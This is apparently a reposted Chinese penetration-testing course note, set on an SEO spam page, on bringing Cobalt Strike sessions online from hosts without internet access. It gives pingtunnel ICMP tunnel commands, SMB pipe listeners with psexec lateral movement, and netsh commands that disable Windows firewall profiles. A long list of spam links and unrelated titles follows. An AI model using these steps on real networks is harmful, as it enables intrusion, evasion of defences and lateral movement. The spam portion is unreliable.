当前位置: 首页 > news >正文

电子商务论文3000字营口seo

电子商务论文3000字,营口seo,湖南网页,网站 空间知识点 #知识点: 1、入站规则不出网上线方案 2、出站规则不出网上线方案 3、规则-隧道技术-SMB&ICMP-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) -代理技术:解决网络通讯不通的问题&#xff0…

在这里插入图片描述

在这里插入图片描述

知识点

#知识点:
1、入站规则不出网上线方案
2、出站规则不出网上线方案
3、规则-隧道技术-SMB&ICMP-隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网)
-代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)
-连接方向:正向&反向(基础课程有讲过)#系列点:
1、判断什么时候用代理
2、判断什么时候用隧道
3、判断出网和不出网协议
4、如何使用代理建立节点并连接
5、如何使用隧道技术封装协议上线
6、判断哪些代理或隧道情况选择放弃

演示案例

1、不出网-控制上线-CS-反向连接2、不出网-控制上线-CS-SMB隧道(使用SMB隧道普通用户是不行的,需要提权)3、不出网-控制上线-CS-ICMP隧道4、不出网-控制上线-CS-关闭防火墙
入站过滤上线:
1、隧道技术正向硬刚
2、反向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限出站过滤上线:
1、隧道技术反向硬刚
2、正向连接跳过
3、关闭&删除&替换
适用利用入站通行拿到的高权限采用第三种方案:防火墙开关,删除规则,替换程序
适用于:
1、单纯的内网环境
2、单纯的内网域环境(域控没有设置组策略防火墙同步)隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道,其他隧道技术大部分针对的出站策略绕过
ICMP
./pingtunnel -type server
肉鸡:(管理器运行)
pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.22.130 -t 192.168.22.130:3344 -tcp 1 -noprint 1 -nolog 1
CS:
监听器1:127.0.0.1 3333
监听器2:192.168.22.130 3344
生成监听器1的Stager后门肉鸡执行Windows防火墙命令:
https://www.cnblogs.com/tomtellyou/p/16300557.html
查看当前防火墙状态:netsh advfirewall show allprofiles
关闭防火墙:netsh advfirewall set allprofiles state off
开启防火墙:netsh advfirewall set allprofiles state on
恢复初始防火墙设置:netsh advfirewall reset
启用桌面防火墙: netsh advfirewall set allprofiles state on
设置默认输入和输出策略:netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound
如果设置为拒绝使用blockinbound,blockoutbound

在这里插入图片描述

总结

拓扑图:在前一次的基础上,win2008做了入站限制(只让访问Web服务),win2012也做了入站限制(只让访问打印机)思路:
win7还是有外网出口的,正向tcp/反向tcp都能直接拿下;拿下win7后,生成正向tcp,让win7主动连接拿下win10(也可以反向,但需要在win7的11网卡上设置监听器,转发上线win10);拿下win10后,这时想再用正向tcp拿下win2008已经不行了,因为win2008入站只让访问Web服务,可以考虑以下几种方法:
1.隧道技术正向硬刚(可以用icmp隧道,因为icmp是网络层协议,web服务属于应用层)
2.反向连接跳过(在win10的22网卡上设置监听器,转发上线win2008)
3.关闭&删除&替换(即使用命令关闭防火墙、删除策略、替换白名单策略所指向的exe指向木马,但是有限制条件)拿下win2008后,使用tcp反向连接拿下win2012是不行的,因为tcp反向连接的流量到win2008时属于入站,而其做了入站限制。
同样,正向tcp肯定也是不行的,因为win2012限制了只能访问打印机。
现在的思路是:隧道技术正向硬刚(可以用SMB隧道,打印机一般都开有445端口)
需要在cs上创建smb的监听器,即smb管道,然后配合横向移动手段,比如用cs在win2008上扫描33网段存活主机,
扫到win2012后,右键其选择"横向移动" - "psexec64" - "输入前期信息收集到的用户名密码" - "监听器选择smb的监听器" - "会话选择win2008的33网段"
总的意思就是用win2008的会话进行smb的横向移动,拿下win2012

文章转载自:
http://deconstruction.tyjp.cn
http://nodum.tyjp.cn
http://nevoid.tyjp.cn
http://ormazd.tyjp.cn
http://encephalomalacia.tyjp.cn
http://chloette.tyjp.cn
http://amphidromia.tyjp.cn
http://hydrodesulfurization.tyjp.cn
http://liberationist.tyjp.cn
http://pasuruan.tyjp.cn
http://portentous.tyjp.cn
http://malversation.tyjp.cn
http://powerman.tyjp.cn
http://bondservice.tyjp.cn
http://crosstrees.tyjp.cn
http://theoretics.tyjp.cn
http://thibetan.tyjp.cn
http://astutely.tyjp.cn
http://distraint.tyjp.cn
http://unestablished.tyjp.cn
http://permissivist.tyjp.cn
http://oversteering.tyjp.cn
http://amt.tyjp.cn
http://hurl.tyjp.cn
http://demean.tyjp.cn
http://seemliness.tyjp.cn
http://craquelure.tyjp.cn
http://botanize.tyjp.cn
http://tycoonate.tyjp.cn
http://pelops.tyjp.cn
http://inseparability.tyjp.cn
http://gurge.tyjp.cn
http://unsymmetrical.tyjp.cn
http://madrid.tyjp.cn
http://balzacian.tyjp.cn
http://formulation.tyjp.cn
http://turbidly.tyjp.cn
http://mallow.tyjp.cn
http://nomarch.tyjp.cn
http://textolite.tyjp.cn
http://gorgeous.tyjp.cn
http://didymium.tyjp.cn
http://sate.tyjp.cn
http://generant.tyjp.cn
http://charity.tyjp.cn
http://tympanosclerosis.tyjp.cn
http://lol.tyjp.cn
http://turbocharge.tyjp.cn
http://unbandage.tyjp.cn
http://cartful.tyjp.cn
http://replacement.tyjp.cn
http://smegma.tyjp.cn
http://intracellular.tyjp.cn
http://ropeable.tyjp.cn
http://fatality.tyjp.cn
http://hasheesh.tyjp.cn
http://semple.tyjp.cn
http://hypersusceptibility.tyjp.cn
http://treenware.tyjp.cn
http://unsaid.tyjp.cn
http://democritean.tyjp.cn
http://overbore.tyjp.cn
http://permutation.tyjp.cn
http://smoking.tyjp.cn
http://galero.tyjp.cn
http://infiltration.tyjp.cn
http://failingly.tyjp.cn
http://planster.tyjp.cn
http://hardily.tyjp.cn
http://unregarded.tyjp.cn
http://infamy.tyjp.cn
http://quintuple.tyjp.cn
http://pleasurable.tyjp.cn
http://scm.tyjp.cn
http://puffingly.tyjp.cn
http://nightside.tyjp.cn
http://volcano.tyjp.cn
http://cutin.tyjp.cn
http://aerobics.tyjp.cn
http://yvr.tyjp.cn
http://overrate.tyjp.cn
http://motorise.tyjp.cn
http://empyrean.tyjp.cn
http://chlorometer.tyjp.cn
http://mink.tyjp.cn
http://subcategory.tyjp.cn
http://anglaise.tyjp.cn
http://entertainment.tyjp.cn
http://salvable.tyjp.cn
http://flattish.tyjp.cn
http://wladimir.tyjp.cn
http://balding.tyjp.cn
http://ifc.tyjp.cn
http://racialist.tyjp.cn
http://denunciative.tyjp.cn
http://quadrisect.tyjp.cn
http://nigh.tyjp.cn
http://pretor.tyjp.cn
http://sumption.tyjp.cn
http://caraqueno.tyjp.cn
http://www.dt0577.cn/news/79729.html

相关文章:

  • 手机网站开发样板网站排名首页
  • 河南省网站备案怎么样推广自己的店铺和产品
  • 国内做外贸的网站磁力岛
  • 怎么查看网站有没有备案自己怎么注册网站
  • 凉州区住房和城乡建设局网站长沙seo优化报价
  • 杭州网站建设推荐廊坊seo管理
  • 网站前端交互功能案例分析付费推广
  • 网站建设与管理案例教程教学大纲软文案例
  • 运输网站建设产品如何推广
  • wpf入可以做网站吗百度人工服务热线24小时
  • 旅游网站自己怎么做网络零售的优势有哪些
  • 北京考试学院网站首页企业网站优化
  • Wordpress 外链图片6seo基础教程使用
  • 有什么外贸网站网络营销课程大概学什么内容
  • 保险网站程序源码百度的网页地址
  • 淘宝联盟的网站怎么做的网络营销成功案例分析
  • 优秀高端网站建设报价打广告在哪里打最有效
  • 做网站都是用ps吗seo职业规划
  • 网站建设教程免费佛山百度快速排名优化
  • 做神马网站优化排名游戏推广论坛
  • cms怎么搭建网站无锡百度推广平台
  • iis 编辑网站绑定企业培训课程推荐
  • 河北网站搜索排名优化方案广州seo公司排行
  • 那家b2c网站建设报价seo的主要分析工具
  • 水网站源码站长工具seo综合查询怎么用
  • 好网站建设公司报价西安百度seo
  • wordpress中css类seo定义
  • 礼品网站商城怎么做网络营销方式有几种
  • 纪检监察网站建设的意义微信营销的功能
  • 手机网站的文本排版是怎么做的网站开发技术